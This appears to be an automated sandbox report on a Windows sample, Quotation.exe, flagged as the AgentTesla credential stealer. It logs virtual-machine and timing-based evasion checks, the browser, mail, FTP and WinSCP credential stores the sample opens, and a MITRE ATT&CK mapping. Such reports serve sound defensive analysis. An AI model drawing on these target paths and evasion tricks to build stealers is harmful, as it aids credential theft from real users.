
File created: C:\Users\user\AppData\Local\Temp\nsbDE39.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Quotation.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Quotation.exe	API/Special instruction interceptor: Address: 5B9ABB4
Source: C:\Users\user\Desktop\Quotation.exe	API/Special instruction interceptor: Address: 271ABB4

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Quotation.exe	RDTSC instruction interceptor: First address: 5B497DF second address: 5B497DF instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F7950CA1820h 0x00000006 test esi, 599FB90Eh 0x0000000c inc ebp 0x0000000d test al, C1h 0x0000000f inc ebx 0x00000010 test dl, bl 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Quotation.exe	RDTSC instruction interceptor: First address: 26C97DF second address: 26C97DF instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F79511522E0h 0x00000006 test esi, 599FB90Eh 0x0000000c inc ebp 0x0000000d test al, C1h 0x0000000f inc ebx 0x00000010 test dl, bl 0x00000012 rdtsc

Source: C:\Users\user\Desktop\Quotation.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Memory allocated: 35060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Memory allocated: 34F70000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199891	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199781	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199672	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199563	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199453	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199344	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199219	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199109	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198891	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198781	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198672	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198562	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198453	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198344	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198219	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198109	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1197890	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Window / User API: threadDelayed 7747			Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Window / User API: threadDelayed 2068			Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsbDE39.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Quotation.exe

Evaded block: after key decision

graph_0-2964

Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2860	Thread sleep count: 7747 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -99891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 2860	Thread sleep count: 2068 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -99782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -99657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -99532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -99422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -99313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -99188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -99063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -98938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -98813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -98704s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -98579s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -98454s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -98329s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -98204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -98079s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -97954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -97829s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -97704s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -97579s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -97454s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -97329s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -97204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -97079s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -96954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -96829s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -96704s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -96579s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -96454s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1199891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1199781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1199672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1199563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1199453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1199344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1199219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1199109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1199000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1198891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1198781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1198672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1198562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1198453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1198344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1198219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1198109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1198000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 3028	Thread sleep time: -1197890s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Quotation.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Quotation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_004066F7
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_004065AD FindFirstFileW,FindClose,		0_2_004065AD

Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99891	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99782	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99657	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99532	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99422	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99313	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99188	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99063	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98938	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98813	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98704	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98579	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98454	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98329	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98204	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98079	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97954	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97829	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97704	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97579	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97454	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97329	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97204	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97079	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 96954	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 96829	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 96704	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 96579	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 96454	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199891	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199781	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199672	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199563	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199453	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199344	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199219	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199109	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198891	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198781	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198672	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198562	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198453	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198344	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198219	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198109	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1198000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1197890	Jump to behavior

Source: Quotation.exe, 00000009.00000002.2499184774.0000000004C87000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2499184774.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2499184774.0000000004C38000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Quotation.exe

API call chain: ExitProcess graph end node

graph_0-2850

Source: C:\Users\user\Desktop\Quotation.exe

Code function: 0_2_00403148 LdrInitializeThunk,GetTickCount,GetTickCount,LdrInitializeThunk,MulDiv,wsprintfW,LdrInitializeThunk,

0_2_00403148

Source: C:\Users\user\Desktop\Quotation.exe

0_2_73C62351

Source: C:\Users\user\Desktop\Quotation.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Process created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Users\user\Desktop\Quotation.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

0_2_004036DA

Source: C:\Users\user\Desktop\Quotation.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000009.00000002.2518927845.00000000350DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2518927845.00000000350B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation.exe PID: 1516, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Quotation.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Quotation.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000009.00000002.2518927845.00000000350B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation.exe PID: 1516, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000009.00000002.2518927845.00000000350DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2518927845.00000000350B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation.exe PID: 1516, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Obfuscated Files or Information	21 Input Capture	225 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Process Injection	1 DLL Side-Loading	1 Credentials in Registry	311 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	141 Virtualization/Sandbox Evasion	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
